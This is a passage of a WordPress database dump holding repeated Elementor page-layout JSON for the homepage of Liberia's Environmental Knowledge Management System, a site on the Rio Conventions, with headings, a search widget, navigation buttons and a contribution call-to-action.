":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11450,1859,'_elementor_version','2.7.5'),(11451,1859,'_elementor_template_type','wp-page'),(11452,1859,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11454,1860,'_wp_page_template','default'),(11455,1860,'_elementor_edit_mode','builder'),(11456,1860,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"roxy\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11457,1860,'_elementor_version','2.7.5'),(11458,1860,'_elementor_template_type','wp-page'),(11459,1860,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11461,1861,'_wp_page_template','default'),(11462,1861,'_elementor_edit_mode','builder'),(11463,1861,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 